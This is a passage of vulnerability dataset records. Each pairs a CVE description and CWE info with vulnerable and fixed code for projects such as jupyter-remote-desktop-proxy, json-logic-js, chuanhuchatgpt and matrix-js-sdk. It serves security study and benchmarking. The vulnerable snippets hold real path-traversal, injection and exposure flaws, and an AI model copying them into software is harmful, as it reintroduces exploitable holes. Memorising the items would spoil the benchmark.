filepath.Join(dest, filepath.FromSlash(target))\n+\t\tif !strings.HasPrefix(target, dest+string(filepath.Separator)) && dest != target {\n+\t\t\t// this shouldn't happen due to the sanitization above but always check\n+\t\t\treturn fmt.Errorf(\"invalid cpio path %q\", entry.Header.filename)\n+\t\t}\n \t\t// Create the parent directory if it doesn't exist.\n-\t\tif _, err := os.Stat(parent); os.IsNotExist(err) {\n-\t\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n-\t\t\t\treturn err\n-\t\t\t}\n+\t\tparent := filepath.Dir(target)\n+\t\tif err := os.MkdirAll(parent, 0755); err != nil {\n+\t\t\treturn err\n \t\t}\n-\n \t\t// FIXME: Need a makedev implementation in go.\n \n \t\tswitch entry.Header.Mode() &^ 07777 {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-32428", "cve_description": "Jupyter Remote Desktop Proxy allows you to run a Linux Desktop on a JupyterHub. jupyter-remote-desktop-proxy was meant to rely on UNIX sockets readable only by the current user since version 3.0.0, but when used with TigerVNC, the VNC server started by jupyter-remote-desktop-proxy were still accessible via the network. This vulnerability does not affect users having TurboVNC as the vncserver executable. This issue is fixed in 3.0.1.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/jupyterhub/jupyter-remote-desktop-proxy", "patch_url": ["https://github.com/jupyterhub/jupyter-remote-desktop-proxy/commit/7dd54c25a4253badd8ea68895437e5a66a59090d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_287_1", "commit": "5a46ef7", "file_path": "jupyter_remote_desktop_proxy/setup_websockify.py", "start_line": 8, "end_line": 46, "snippet": "def setup_websockify():\n vncserver = which('vncserver')\n if not vncserver:\n raise RuntimeError(\n \"vncserver executable not found, please install a VNC server\"\n )\n\n # {unix_socket} is expanded by jupyter-server-proxy\n vnc_args = [vncserver, '-rfbunixpath', '{unix_socket}']\n\n xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n xstartup = os.path.join(HERE, 'share/xstartup')\n if xstartup:\n vnc_args.extend(['-xstartup', xstartup])\n\n vnc_command = shlex.join(\n vnc_args\n + [\n '-verbose',\n '-fg',\n '-geometry',\n '1680x1050',\n '-SecurityTypes',\n 'None',\n ]\n )\n\n return {\n 'command': ['/bin/sh', '-c', f'cd {os.getcwd()} && {vnc_command}'],\n 'timeout': 30,\n 'new_browser_window': True,\n # We want the launcher entry to point to /desktop/, not to /desktop-websockify/\n # /desktop/ is the user facing URL, while /desktop-websockify/ now *only* serves\n # websockets.\n \"launcher_entry\": {\"title\": \"Desktop\", \"path_info\": \"desktop\"},\n \"unix_socket\": True,\n \"raw_socket_proxy\": True,\n }"}], "fix_func": [{"id": "fix_py_287_1", "commit": "7dd54c25a4253badd8ea68895437e5a66a59090d", "file_path": "jupyter_remote_desktop_proxy/setup_websockify.py", "start_line": 8, "end_line": 65, "snippet": "def setup_websockify():\n vncserver = which('vncserver')\n if not vncserver:\n raise RuntimeError(\n \"vncserver executable not found, please install a VNC server\"\n )\n\n # TurboVNC and TigerVNC share the same origin and both use a Perl script\n # as the executable vncserver. We can determine if vncserver is TigerVNC\n # by searching tigervnc string in the Perl script.\n #\n # The content of the vncserver executable can differ depending on how\n # TigerVNC and TurboVNC has been distributed. Below are files known to be\n # read in some situations:\n #\n # - https://github.com/TigerVNC/tigervnc/blob/v1.13.1/unix/vncserver/vncserver.in\n # - https://github.com/TurboVNC/turbovnc/blob/3.1.1/unix/vncserver.in\n #\n with open(vncserver) as vncserver_file:\n vncserver_file_text = vncserver_file.read().casefold()\n is_turbovnc = \"turbovnc\" in vncserver_file_text\n\n # {unix_socket} is expanded by jupyter-server-proxy\n vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\", \"-rfbport\", \"-1\"]\n if is_turbovnc:\n # turbovnc doesn't handle being passed -rfbport -1, but turbovnc also\n # defaults to not opening a TCP port which is what we want to ensure\n vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\"]\n\n xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n xstartup = os.path.join(HERE, 'share/xstartup')\n if xstartup:\n vnc_args.extend(['-xstartup', xstartup])\n\n vnc_command = shlex.join(\n vnc_args\n + [\n '-verbose',\n '-fg',\n '-geometry',\n '1680x1050',\n '-SecurityTypes',\n 'None',\n ]\n )\n\n return {\n 'command': ['/bin/sh', '-c', f'cd {os.getcwd()} && {vnc_command}'],\n 'timeout': 30,\n 'new_browser_window': True,\n # We want the launcher entry to point to /desktop/, not to /desktop-websockify/\n # /desktop/ is the user facing URL, while /desktop-websockify/ now *only* serves\n # websockets.\n \"launcher_entry\": {\"title\": \"Desktop\", \"path_info\": \"desktop\"},\n \"unix_socket\": True,\n \"raw_socket_proxy\": True,\n }"}], "vul_patch": "--- a/jupyter_remote_desktop_proxy/setup_websockify.py\n+++ b/jupyter_remote_desktop_proxy/setup_websockify.py\n@@ -5,8 +5,27 @@\n \"vncserver executable not found, please install a VNC server\"\n )\n \n+ # TurboVNC and TigerVNC share the same origin and both use a Perl script\n+ # as the executable vncserver. We can determine if vncserver is TigerVNC\n+ # by searching tigervnc string in the Perl script.\n+ #\n+ # The content of the vncserver executable can differ depending on how\n+ # TigerVNC and TurboVNC has been distributed. Below are files known to be\n+ # read in some situations:\n+ #\n+ # - https://github.com/TigerVNC/tigervnc/blob/v1.13.1/unix/vncserver/vncserver.in\n+ # - https://github.com/TurboVNC/turbovnc/blob/3.1.1/unix/vncserver.in\n+ #\n+ with open(vncserver) as vncserver_file:\n+ vncserver_file_text = vncserver_file.read().casefold()\n+ is_turbovnc = \"turbovnc\" in vncserver_file_text\n+\n # {unix_socket} is expanded by jupyter-server-proxy\n- vnc_args = [vncserver, '-rfbunixpath', '{unix_socket}']\n+ vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\", \"-rfbport\", \"-1\"]\n+ if is_turbovnc:\n+ # turbovnc doesn't handle being passed -rfbport -1, but turbovnc also\n+ # defaults to not opening a TCP port which is what we want to ensure\n+ vnc_args = [vncserver, '-rfbunixpath', \"{unix_socket}\"]\n \n xstartup = os.getenv(\"JUPYTER_REMOTE_DESKTOP_PROXY_XSTARTUP\")\n if not xstartup and not os.path.exists(os.path.expanduser('~/.vnc/xstartup')):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-4329", "cve_description": "A vulnerability, which was classified as critical, has been found in json-logic-js 2.0.0. Affected by this issue is some unknown functionality of the file logic.js. The manipulation leads to command injection. Upgrading to version 2.0.1 is able to address this issue. The patch is identified as c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227. It is recommended to upgrade the affected component. VDB-222266 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/jwadhams/json-logic-js", "patch_url": ["https://github.com/jwadhams/json-logic-js/commit/c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_186_1", "commit": "17e9fed", "file_path": "logic.js", "start_line": 205, "end_line": 361, "snippet": " jsonLogic.apply = function(logic, data) {\n // Does this array contain logic? Only one way to find out.\n if (Array.isArray(logic)) {\n return logic.map(function(l) {\n return jsonLogic.apply(l, data);\n });\n }\n // You've recursed to a primitive, stop!\n if ( ! jsonLogic.is_logic(logic) ) {\n return logic;\n }\n\n var op = jsonLogic.get_operator(logic);\n var values = logic[op];\n var i;\n var current;\n var scopedLogic;\n var scopedData;\n var filtered;\n var initial;\n\n // easy syntax for unary operators, like {\"var\" : \"x\"} instead of strict {\"var\" : [\"x\"]}\n if ( ! Array.isArray(values)) {\n values = [values];\n }\n\n // 'if', 'and', and 'or' violate the normal rule of depth-first calculating consequents, let each manage recursion as needed.\n if (op === \"if\" || op == \"?:\") {\n /* 'if' should be called with a odd number of parameters, 3 or greater\n This works on the pattern:\n if( 0 ){ 1 }else{ 2 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else{ 4 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else if( 4 ){ 5 }else{ 6 };\n\n The implementation is:\n For pairs of values (0,1 then 2,3 then 4,5 etc)\n If the first evaluates truthy, evaluate and return the second\n If the first evaluates falsy, jump to the next pair (e.g, 0,1 to 2,3)\n given one parameter, evaluate and return it. (it's an Else and all the If/ElseIf were false)\n given 0 parameters, return NULL (not great practice, but there was no Else)\n */\n for (i = 0; i < values.length - 1; i += 2) {\n if ( jsonLogic.truthy( jsonLogic.apply(values[i], data) ) ) {\n return jsonLogic.apply(values[i+1], data);\n }\n }\n if (values.length === i+1) {\n return jsonLogic.apply(values[i], data);\n }\n return null;\n } else if (op === \"and\") { // Return first falsy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( ! jsonLogic.truthy(current)) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"or\") {// Return first truthy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( jsonLogic.truthy(current) ) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"filter\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n // Return only the elements from the array in the first argument,\n // that return truthy when passed to the logic in the second argument.\n // For parity with JavaScript, reindex the returned array\n return scopedData.filter(function(datum) {\n return jsonLogic.truthy( jsonLogic.apply(scopedLogic, datum));\n });\n } else if (op === \"map\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n\n return scopedData.map(function(datum) {\n return jsonLogic.apply(scopedLogic, datum);\n });\n } else if (op === \"reduce\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n initial = typeof values[2] !== \"undefined\" ? values[2] : null;\n\n if ( ! Array.isArray(scopedData)) {\n return initial;\n }\n\n return scopedData.reduce(\n function(accumulator, current) {\n return jsonLogic.apply(\n scopedLogic,\n {current: current, accumulator: accumulator}\n );\n },\n initial\n );\n } else if (op === \"all\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n // All of an empty set is false. Note, some and none have correct fallback after the for loop\n if ( ! scopedData.length) {\n return false;\n }\n for (i=0; i < scopedData.length; i+=1) {\n if ( ! jsonLogic.truthy( jsonLogic.apply(scopedLogic, scopedData[i]) )) {\n return false; // First falsy, short circuit\n }\n }\n return true; // All were truthy\n } else if (op === \"none\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length === 0;\n } else if (op === \"some\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length > 0;\n }\n\n // Everyone else gets immediate depth-first recursion\n values = values.map(function(val) {\n return jsonLogic.apply(val, data);\n });\n\n\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n if (typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n // Descending into operations\n operation = operation[sub_ops[i]];\n if (operation === undefined) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n }\n\n return operation.apply(data, values);\n }\n\n throw new Error(\"Unrecognized operation \" + op );\n };"}], "fix_func": [{"id": "fix_js_186_1", "commit": "c1dd82f", "file_path": "logic.js", "start_line": 205, "end_line": 362, "snippet": " jsonLogic.apply = function(logic, data) {\n // Does this array contain logic? Only one way to find out.\n if (Array.isArray(logic)) {\n return logic.map(function(l) {\n return jsonLogic.apply(l, data);\n });\n }\n // You've recursed to a primitive, stop!\n if ( ! jsonLogic.is_logic(logic) ) {\n return logic;\n }\n\n var op = jsonLogic.get_operator(logic);\n var values = logic[op];\n var i;\n var current;\n var scopedLogic;\n var scopedData;\n var filtered;\n var initial;\n\n // easy syntax for unary operators, like {\"var\" : \"x\"} instead of strict {\"var\" : [\"x\"]}\n if ( ! Array.isArray(values)) {\n values = [values];\n }\n\n // 'if', 'and', and 'or' violate the normal rule of depth-first calculating consequents, let each manage recursion as needed.\n if (op === \"if\" || op == \"?:\") {\n /* 'if' should be called with a odd number of parameters, 3 or greater\n This works on the pattern:\n if( 0 ){ 1 }else{ 2 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else{ 4 };\n if( 0 ){ 1 }else if( 2 ){ 3 }else if( 4 ){ 5 }else{ 6 };\n\n The implementation is:\n For pairs of values (0,1 then 2,3 then 4,5 etc)\n If the first evaluates truthy, evaluate and return the second\n If the first evaluates falsy, jump to the next pair (e.g, 0,1 to 2,3)\n given one parameter, evaluate and return it. (it's an Else and all the If/ElseIf were false)\n given 0 parameters, return NULL (not great practice, but there was no Else)\n */\n for (i = 0; i < values.length - 1; i += 2) {\n if ( jsonLogic.truthy( jsonLogic.apply(values[i], data) ) ) {\n return jsonLogic.apply(values[i+1], data);\n }\n }\n if (values.length === i+1) {\n return jsonLogic.apply(values[i], data);\n }\n return null;\n } else if (op === \"and\") { // Return first falsy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( ! jsonLogic.truthy(current)) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"or\") {// Return first truthy, or last\n for (i=0; i < values.length; i+=1) {\n current = jsonLogic.apply(values[i], data);\n if ( jsonLogic.truthy(current) ) {\n return current;\n }\n }\n return current; // Last\n } else if (op === \"filter\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n // Return only the elements from the array in the first argument,\n // that return truthy when passed to the logic in the second argument.\n // For parity with JavaScript, reindex the returned array\n return scopedData.filter(function(datum) {\n return jsonLogic.truthy( jsonLogic.apply(scopedLogic, datum));\n });\n } else if (op === \"map\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n\n if ( ! Array.isArray(scopedData)) {\n return [];\n }\n\n return scopedData.map(function(datum) {\n return jsonLogic.apply(scopedLogic, datum);\n });\n } else if (op === \"reduce\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n initial = typeof values[2] !== \"undefined\" ? values[2] : null;\n\n if ( ! Array.isArray(scopedData)) {\n return initial;\n }\n\n return scopedData.reduce(\n function(accumulator, current) {\n return jsonLogic.apply(\n scopedLogic,\n {current: current, accumulator: accumulator}\n );\n },\n initial\n );\n } else if (op === \"all\") {\n scopedData = jsonLogic.apply(values[0], data);\n scopedLogic = values[1];\n // All of an empty set is false. Note, some and none have correct fallback after the for loop\n if ( ! scopedData.length) {\n return false;\n }\n for (i=0; i < scopedData.length; i+=1) {\n if ( ! jsonLogic.truthy( jsonLogic.apply(scopedLogic, scopedData[i]) )) {\n return false; // First falsy, short circuit\n }\n }\n return true; // All were truthy\n } else if (op === \"none\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length === 0;\n } else if (op === \"some\") {\n filtered = jsonLogic.apply({filter: values}, data);\n return filtered.length > 0;\n }\n\n // Everyone else gets immediate depth-first recursion\n values = values.map(function(val) {\n return jsonLogic.apply(val, data);\n });\n\n\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n if (operations.hasOwnProperty(op) && typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n\n if (!operation.hasOwnProperty(sub_ops[i])) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n // Descending into operations\n operation = operation[sub_ops[i]];\n }\n\n return operation.apply(data, values);\n }\n\n throw new Error(\"Unrecognized operation \" + op );\n };"}], "vul_patch": "--- a/logic.js\n+++ b/logic.js\n@@ -136,18 +136,19 @@\n // The operation is called with \"data\" bound to its \"this\" and \"values\" passed as arguments.\n // Structured commands like % or > can name formal arguments while flexible commands (like missing or merge) can operate on the pseudo-array arguments\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/arguments\n- if (typeof operations[op] === \"function\") {\n+ if (operations.hasOwnProperty(op) && typeof operations[op] === \"function\") {\n return operations[op].apply(data, values);\n } else if (op.indexOf(\".\") > 0) { // Contains a dot, and not in the 0th position\n var sub_ops = String(op).split(\".\");\n var operation = operations;\n for (i = 0; i < sub_ops.length; i++) {\n- // Descending into operations\n- operation = operation[sub_ops[i]];\n- if (operation === undefined) {\n+\n+ if (!operation.hasOwnProperty(sub_ops[i])) {\n throw new Error(\"Unrecognized operation \" + op +\n \" (failed at \" + sub_ops.slice(0, i+1).join(\".\") + \")\");\n }\n+ // Descending into operations\n+ operation = operation[sub_ops[i]];\n }\n \n return operation.apply(data, values);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7962", "cve_description": "An arbitrary file read vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240628 due to insufficient validation when loading prompt template files. An attacker can read any file that matches specific criteria using an absolute path. The file must not have a .json extension and, except for the first line, every other line must contain commas. This vulnerability allows reading parts of format-compliant files, including code and log files, which may contain highly sensitive information such as account credentials.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gaizhenbiao/chuanhuchatgpt", "patch_url": ["https://github.com/gaizhenbiao/chuanhuchatgpt/commit/2836fd1db3efcd5ede63c0e7fbbdf677730dbb51"], "programing_language": "Python", "vul_func": [{"id": "vul_py_369_1", "commit": "c2c2b86d14e28d3b106f067ebb9b44f8acfbff1e", "file_path": "modules/utils.py", "start_line": 520, "end_line": 540, "snippet": "def load_template(filename, mode=0):\n logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n if filename.endswith(\".json\"):\n with open(os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n lines = lines[1:]\n if mode == 1:\n return sorted_by_pinyin([row[0] for row in lines])\n elif mode == 2:\n return {row[0]: row[1] for row in lines}\n else:\n choices = sorted_by_pinyin([row[0] for row in lines])\n return {row[0]: row[1] for row in lines}, gr.Dropdown(choices=choices)"}], "fix_func": [{"id": "fix_py_369_1", "commit": "2836fd1db3efcd5ede63c0e7fbbdf677730dbb51", "file_path": "modules/utils.py", "start_line": 520, "end_line": 544, "snippet": "def load_template(filename, mode=0):\n logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n template_file_path = os.path.join(TEMPLATES_DIR, filename)\n # check if template_file_path is inside TEMPLATES_DIR\n if not os.path.realpath(template_file_path).startswith(os.path.realpath(TEMPLATES_DIR)):\n return \"Invalid template file path\"\n if filename.endswith(\".json\"):\n with open(template_file_path, \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n template_file_path, \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n lines = lines[1:]\n if mode == 1:\n return sorted_by_pinyin([row[0] for row in lines])\n elif mode == 2:\n return {row[0]: row[1] for row in lines}\n else:\n choices = sorted_by_pinyin([row[0] for row in lines])\n return {row[0]: row[1] for row in lines}, gr.Dropdown(choices=choices)"}], "vul_patch": "--- a/modules/utils.py\n+++ b/modules/utils.py\n@@ -1,13 +1,17 @@\n def load_template(filename, mode=0):\n logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n+ template_file_path = os.path.join(TEMPLATES_DIR, filename)\n+ # check if template_file_path is inside TEMPLATES_DIR\n+ if not os.path.realpath(template_file_path).startswith(os.path.realpath(TEMPLATES_DIR)):\n+ return \"Invalid template file path\"\n if filename.endswith(\".json\"):\n- with open(os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\") as f:\n+ with open(template_file_path, \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n- os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\"\n+ template_file_path, \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-47080", "cve_description": "matrix-js-sdk is the Matrix Client-Server SDK for JavaScript and TypeScript. In matrix-js-sdk versions versions 9.11.0 through 34.7.0, the method `MatrixClient.sendSharedHistoryKeys` is vulnerable to interception by malicious homeservers. The method was introduced by MSC3061) and is commonly used to share historical message keys with newly invited users, granting them access to past messages in the room. However, it unconditionally sends these \"shared\" keys to all of the invited user's devices, regardless of whether the user's cryptographic identity is verified or whether the user's devices are signed by that identity. This allows the attacker to potentially inject its own devices to receive sensitive historical keys without proper security checks. Note that this only affects clients running the SDK with the legacy crypto stack. Clients using the new Rust cryptography stack (i.e. those that call `MatrixClient.initRustCrypto()` instead of `MatrixClient.initCrypto()`) are unaffected by this vulnerability, because `MatrixClient.sendSharedHistoryKeys()` raises an exception in such environments. The vulnerability was fixed in matrix-js-sdk 34.8.0 by removing the vulnerable functionality. As a workaround, remove use of affected functionality from clients.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/matrix-org/matrix-js-sdk", "patch_url": ["https://github.com/matrix-org/matrix-js-sdk/commit/2fb1e659c81f75253c047832dc9dcc2beddfac5f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_205_1", "commit": "868bbfc", "file_path": "spec/unit/models/MSC3089TreeSpace.spec.ts", "start_line": 31, "end_line": 212, "snippet": "describe(\"MSC3089TreeSpace\", () => {\n let client: MatrixClient;\n let room: any;\n let tree: MSC3089TreeSpace;\n const roomId = \"!tree:localhost\";\n const targetUser = \"@target:example.org\";\n\n let powerLevels: MatrixEvent;\n\n beforeEach(() => {\n // TODO: Use utility functions to create test rooms and clients\n client = {\n getRoom: (fetchRoomId: string) => {\n if (fetchRoomId === roomId) {\n return room;\n } else {\n throw new Error(\"Unexpected fetch for unknown room\");\n }\n },\n };\n room = {\n currentState: {\n getStateEvents: (evType: EventType, stateKey: string) => {\n if (evType === EventType.RoomPowerLevels && stateKey === \"\") {\n return powerLevels;\n } else {\n throw new Error(\"Accessed unexpected state event type or key\");\n }\n },\n },\n };\n tree = new MSC3089TreeSpace(client, roomId);\n makePowerLevels(DEFAULT_TREE_POWER_LEVELS_TEMPLATE);\n });\n\n function makePowerLevels(content: any) {\n powerLevels = new MatrixEvent({\n type: EventType.RoomPowerLevels,\n state_key: \"\",\n sender: \"@creator:localhost\",\n event_id: \"$powerlevels\",\n room_id: roomId,\n content: content,\n });\n }\n\n it(\"should populate the room reference\", () => {\n expect(tree.room).toBe(room);\n });\n\n it(\"should proxy the ID member to room ID\", () => {\n expect(tree.id).toEqual(tree.roomId);\n expect(tree.id).toEqual(roomId);\n });\n\n it(\"should support setting the name of the space\", async () => {\n const newName = \"NEW NAME\";\n const fn = jest\n .fn()\n .mockImplementation((stateRoomId: string, eventType: EventType, content: any, stateKey: string) => {\n expect(stateRoomId).toEqual(roomId);\n expect(eventType).toEqual(EventType.RoomName);\n expect(stateKey).toEqual(\"\");\n expect(content).toMatchObject({ name: newName });\n return Promise.resolve();\n });\n client.sendStateEvent = fn;\n await tree.setName(newName);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should support inviting users to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should retry invites to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n if (fn.mock.calls.length === 1) return Promise.reject(new Error(\"Sample Failure\"));\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n\n it(\"should not retry invite permission errors\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.reject(new MatrixError({ errcode: \"M_FORBIDDEN\", error: \"Sample Failure\" }));\n });\n client.invite = fn;\n\n await expect(tree.invite(target, false, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should invite to subspaces\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n tree.getDirectories = () => [\n // Bare minimum overrides. We proxy to our mock function manually so we can\n // count the calls, not to ensure accuracy. The invite function behaving correctly\n // is covered by another test.\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n\n await tree.invite(target, true, false);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n\n it(\"should share keys with invitees\", async () => {\n const target = targetUser;\n const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userIds).toMatchObject([target]);\n return Promise.resolve();\n });\n client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n client.sendSharedHistoryKeys = sendKeysFn;\n\n // Mock the history check as best as possible\n const historyVis = \"shared\";\n const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n // We're not expecting a super rigid test: the function that calls this internally isn't\n // really being tested here.\n expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n expect(stateKey).toEqual(\"\");\n return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n });\n room.currentState.getStateEvents = historyFn;\n\n // Note: inverse test is implicit from other tests, which disable the call stack of this\n // test in order to pass.\n await tree.invite(target, false, true);\n expect(sendKeysFn).toHaveBeenCalledTimes(1);\n expect(historyFn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should not share keys with invitees if inappropriate history visibility\", async () => {\n const target = targetUser;\n const 